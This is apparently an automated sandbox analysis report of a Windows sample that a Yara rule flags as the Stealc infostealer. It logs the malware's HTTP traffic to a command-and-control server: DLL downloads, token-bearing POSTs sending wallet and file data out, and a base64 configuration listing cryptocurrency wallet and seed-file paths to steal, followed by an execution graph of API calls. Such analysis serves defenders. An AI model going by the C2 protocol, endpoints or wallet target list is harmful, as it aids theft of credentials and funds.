                                  Cache-Control: no-cache
                                  Aug 30, 2024 00:48:12.452307940 CEST1236INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:48:12 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                  ETag: "3ef50-5e7e950876500"
                                  Accept-Ranges: bytes
                                  Content-Length: 257872
                                  Content-Type: application/x-msdos-program
                                  Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                  Aug 30, 2024 00:48:12.659667015 CEST99OUTGET /0d60be0de163924d/vcruntime140.dll HTTP/1.1
                                  Host: 185.215.113.100
                                  Cache-Control: no-cache
                                  Aug 30, 2024 00:48:12.906414986 CEST1236INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:48:12 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                  ETag: "13bf0-5e7e950876500"
                                  Accept-Ranges: bytes
                                  Content-Length: 80880
                                  Content-Type: application/x-msdos-program
                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                  Aug 30, 2024 00:48:13.461723089 CEST203OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBG
                                  Host: 185.215.113.100
                                  Content-Length: 1067
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Aug 30, 2024 00:48:14.295829058 CEST202INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:48:13 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=84
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Aug 30, 2024 00:48:14.377152920 CEST469OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----AEBKKECBGIIJJKECGIJE
                                  Host: 185.215.113.100
                                  Content-Length: 267
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 2d 2d 0d 0a
                                  Data Ascii: ------AEBKKECBGIIJJKECGIJEContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------AEBKKECBGIIJJKECGIJEContent-Disposition: form-data; name="message"wallets------AEBKKECBGIIJJKECGIJE--
                                  Aug 30, 2024 00:48:14.625957012 CEST1236INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:48:14 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Vary: Accept-Encoding
                                  Content-Length: 2408
                                  Keep-Alive: timeout=5, max=83
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                  Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                  Aug 30, 2024 00:48:14.628353119 CEST467OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----JJEGIJEGDBFHDGCAFCAE
                                  Host: 185.215.113.100
                                  Content-Length: 265
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 2d 2d 0d 0a
                                  Data Ascii: ------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="message"files------JJEGIJEGDBFHDGCAFCAE--
                                  Aug 30, 2024 00:48:14.902343035 CEST202INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:48:14 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=82
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Aug 30, 2024 00:48:14.917067051 CEST565OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----AKFIDHDGIEGCAKFIIJKF
                                  Host: 185.215.113.100
                                  Content-Length: 363
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                  Data Ascii: ------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="file"------AKFIDHDGIEGCAKFIIJKF--
                                  Aug 30, 2024 00:48:16.014456034 CEST202INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:48:15 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=81
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Aug 30, 2024 00:48:16.014800072 CEST202INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:48:15 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=81
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Aug 30, 2024 00:48:16.320039988 CEST474OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHID
                                  Host: 185.215.113.100
                                  Content-Length: 272
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 2d 2d 0d 0a
                                  Data Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="message"ybncbhylepme------GHJKJDAKEHJDGDGDGHID--
                                  Aug 30, 2024 00:48:16.582369089 CEST1236INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:48:16 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Vary: Accept-Encoding
                                  Content-Length: 5458
                                  Keep-Alive: timeout=5, max=80
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 2a 2e 31 3c 62 72 3e 3c 62 72 3e 2a 2e 30 3c 62 72 3e 3c 62 72 3e 2a 2e 70 6c 3c 62 72 3e 3c 62 72 3e 2a 2e 61 72 3c 62 72 3e 3c 62 72 3e 2a 2e 62 72 3c 62 72 3e 3c 62 72 3e 2a 2e 65 63 3c 62 72 3e 3c 62 72 3e 2a 2e 65 67 3c 62 72 3e 3c 62 72 3e 2a 2e 69 6e 3c 62 72 3e 3c 62 72 3e 2a 2e 70 74 3c 62 72 3e 3c 62 72 3e 2a 2e 61 63 3c 62 72 3e 3c 62 72 3e 2a 2e 62 64 3c 62 72 3e 3c 62 72 3e 2a 2e 7a 6d 3c 62 72 3e 3c 62 72 3e 2a 2e 76 65 3c 62 72 3e 3c 62 72 3e 2a 2e 70 6b 3c 62 72 3e 3c 62 72 3e 2a 2e 72 73 3c 62 72 3e 3c 62 72 3e 2a 2e 70 68 3c 62 72 3e 3c 62 72 3e 2a 2e 6d 78 3c 62 72 3e 3c 62 72 3e 2a 2e 69 6e 3c 62 72 3e 3c 62 72 3e 2a 2e 74 68 3c 62 72 3e 3c 62 72 3e 2a 2e 63 6f 3c 62 72 3e 3c 62 72 3e 2a 2e 69 64 3c 62 72 3e 3c 62 72 3e 2a 7a 2e 69 64 3c 62 72 3e 3c 62 72 3e 2a 2e 74 72 3c 62 72 3e 3c 62 72 3e 2a 2e 63 7a 3c 62 72 3e 3c 62 72 3e 2a 2e 69 6f 3c 62 72 3e 3c 62 72 3e 2a 2e 64 7a 3c 62 72 3e 3c 62 72 3e 2a 2e 64 65 3c 62 72 3e 3c 62 72 3e 2a 2e 6b 72 3c 62 72 3e 3c 62 72 3e 2a 2e 6d [TRUNCATED]
                                  Data Ascii: *.1<br><br>*.0<br><br>*.pl<br><br>*.ar<br><br>*.br<br><br>*.ec<br><br>*.eg<br><br>*.in<br><br>*.pt<br><br>*.ac<br><br>*.bd<br><br>*.zm<br><br>*.ve<br><br>*.pk<br><br>*.rs<br><br>*.ph<br><br>*.mx<br><br>*.in<br><br>*.th<br><br>*.co<br><br>*.id<br><br>*z.id<br><br>*.tr<br><br>*.cz<br><br>*.io<br><br>*.dz<br><br>*.de<br><br>*.kr<br><br>*.ma<br><br>*.jp<br><br>*.za<br><br>*.sa<br><br>*.vn<br><br>*.cl<br><br>*.pe<br><br>*.ke<br><br>*.tw<br><br>*.cn<br><br>*.my<br><br>*.mz<br><br>*.sv<br><br>*.au<br><br>*.bo<br><br>*.mn<br><br>*.lb<br><br>*.es<br><br>*.org<br><br>*.uk<br><br>*.ug<br><br>*.sy<br><br>*.gh<br><br>*.bc<br><br>*.ao<br><br>*.ni<br><br>*.ng<br><br>*.to<br><br>*.edu<br><br>*.it<br><br>*.tn<br><br>*.net<br><br>*.gn<br><br>*.hk<br><br>*.uy<br><br>*.ae<br><br>*.np<br><br>*.mm<br><br>*.do<br><br>*.ir<br><br>*.biz<br><br>*.tv<br><br>*.gt<br><br>*.ps<br><br>*.dk<br><br>*.gp<br><br>*.hu<br><br>*.ge<br><br>*.ci<br><br>*.ca<br><br>*.al<br><br>*.jo<br><br>*.sn<br><br>*.is<br><br>*.ro<br><br>*.cr<br><
                                  Aug 30, 2024 00:48:16.592736959 CEST474OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGID
                                  Host: 185.215.113.100
                                  Content-Length: 272
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 2d 2d 0d 0a
                                  Data Ascii: ------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JJJKFBAAAFHJEBFIEGID--
                                  Aug 30, 2024 00:48:17.389978886 CEST202INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:48:16 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=79
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Target ID:0
                                  Start time:18:47:55
                                  Start date:29/08/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0x180000
                                  File size:1'793'024 bytes
                                  MD5 hash:9EE7D1FB0F1E8A7A998DA096B4DA22A9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:5.3%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:4.2%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:37
                                    execution_graph 58115 6c6ab8ae 58116 6c6ab8ba ___scrt_is_nonwritable_in_current_image 58115->58116 58117 6c6ab8e3 dllmain_raw 58116->58117 58118 6c6ab8c9 58116->58118 58119 6c6ab8de 58116->58119 58117->58118 58120 6c6ab8fd dllmain_crt_dispatch 58117->58120 58128 6c68bed0 DisableThreadLibraryCalls LoadLibraryExW 58119->58128 58120->58118 58120->58119 58122 6c6ab91e 58123 6c6ab94a 58122->58123 58129 6c68bed0 DisableThreadLibraryCalls LoadLibraryExW 58122->58129 58123->58118 58124 6c6ab953 dllmain_crt_dispatch 58123->58124 58124->58118 58126 6c6ab966 dllmain_raw 58124->58126 58126->58118 58127 6c6ab936 dllmain_crt_dispatch dllmain_raw 58127->58123 58128->58122 58129->58127 58130 6c673060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 58135 6c6aab2a 58130->58135 58134 6c6730db 58139 6c6aae0c _crt_atexit _register_onexit_function 58135->58139 58137 6c6730cd 58138 6c6ab320 5 API calls ___raise_securityfailure 58137->58138 58138->58134 58139->58137 58140 6c6735a0 58141 6c6735c4 InitializeCriticalSectionAndSpinCount getenv 58140->58141 58156 6c673846 __aulldiv 58140->58156 58142 6c6738fc strcmp 58141->58142 58148 6c6735f3 __aulldiv 58141->58148 58146 6c673912 strcmp 58142->58146 58142->58148 58144 6c6735f8 QueryPerformanceFrequency 58144->58148 58145 6c6738f4 58146->58148 58147 6c673622 _strnicmp 58147->58148 58149 6c673944 _strnicmp 58147->58149 58148->58144 58148->58147 58148->58149 58151 6c67395d 58148->58151 58152 6c673664 GetSystemTimeAdjustment 58148->58152 58154 6c67375c 58148->58154 58149->58148 58149->58151 58150 6c67376a QueryPerformanceCounter EnterCriticalSection 58153 6c6737b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 58150->58153 58150->58154 58152->58148 58153->58154 58155 6c6737fc LeaveCriticalSection 58153->58155 58154->58150 58154->58153 58154->58155 58154->58156 58155->58154 58155->58156 58157 6c6ab320 5 API calls ___raise_securityfailure 58156->58157 58157->58145 58158 6c68c930 GetSystemInfo VirtualAlloc 58159 6c68c9a3 GetSystemInfo 58158->58159 58166 6c68c973 58158->58166 58160 6c68c9d0 58159->58160 58161 6c68c9b6 58159->58161 58165 6c68c9d8 VirtualAlloc 58160->58165 58160->58166 58161->58160 58164 6c68c9bd 58161->58164 58163 6c68c99b 58164->58166 58167 6c68c9c1 VirtualFree 58164->58167 58168 6c68c9ec 58165->58168 58169 6c68c9f0 58165->58169 58174 6c6ab320 5 API calls ___raise_securityfailure 58166->58174 58167->58166 58168->58166 58175 6c6acbe8 GetCurrentProcess TerminateProcess 58169->58175 58174->58163 58176 196490 58221 1822a0 58176->58221 58200 196504 58201 19a380 4 API calls 58200->58201 58202 19650b 58201->58202 58203 19a380 4 API calls 58202->58203 58204 196512 58203->58204 58205 19a380 4 API calls 58204->58205 58206 196519 58205->58206 58207 19a380 4 API calls 58206->58207 58208 196520 58207->58208 58373 19a270 58208->58373 58210 1965ac 58377 1963c0 GetSystemTime 58210->58377 58212 196529 58212->58210 58214 196562 OpenEventA 58212->58214 58216 196579 58214->58216 58217 196595 CloseHandle Sleep 58214->58217 58220 196581 CreateEventA 58216->58220 58219 1965aa 58217->58219 58219->58212 58220->58210 58575 184610 58221->58575 58223 1822b4 58224 184610 2 API calls 58223->58224 58225 1822cd 58224->58225 58226 184610 2 API calls 58225->58226 58227 1822e6 58226->58227 58228 184610 2 API calls 58227->58228 58229 1822ff 58228->58229 58230 184610 2 API calls 58229->58230 58231 182318 58230->58231 58232 184610 2 API calls 58231->58232 58233 182331 58232->58233 58234 184610 2 API calls 58233->58234 58235 18234a 58234->58235 58236 184610 2 API calls 58235->58236 58237 182363 58236->58237 58238 184610 2 API calls 58237->58238 58239 18237c 58238->58239 58240 184610 2 API calls 58239->58240 58241 182395 58240->58241 58242 184610 2 API calls 58241->58242 58243 1823ae 58242->58243 58244 184610 2 API calls 58243->58244 58245 1823c7 58244->58245 58246 184610 2 API calls 58245->58246 58247 1823e0 58246->58247 58248 184610 2 API calls 58247->58248 58249 1823f9 58248->58249 58250 184610 2 API calls 58249->58250 58251 182412 58250->58251 58252 184610 2 API calls 58251->58252 58253 18242b 58252->58253 58254 184610 2 API calls 58253->58254 58255 182444 58254->58255 58256 184610 2 API calls 58255->58256 58257 18245d 58256->58257 58258 184610 2 API calls 58257->58258 58259 182476 58258->58259 58260 184610 2 API calls 58259->58260 58261 18248f 58260->58261 58262 184610 2 API calls 58261->58262 58263 1824a8 58262->58263 58264 184610 2 API calls 58263->58264 58265 1824c1 58264->58265 58266 184610 2 API calls 58265->58266 58267 1824da 58266->58267 58268 184610 2 API calls 58267->58268 58269 1824f3 58268->58269 58270 184610 2 API calls 58269->58270 58271 18250c 58270->58271 58272 184610 2 API calls 58271->58272 58273 182525 58272->58273 58274 184610 2 API calls 58273->58274 58275 18253e 58274->58275 58276 184610 2 API calls 58275->58276 58277 182557 58276->58277 58278 184610 2 API calls 58277->58278 58279 182570 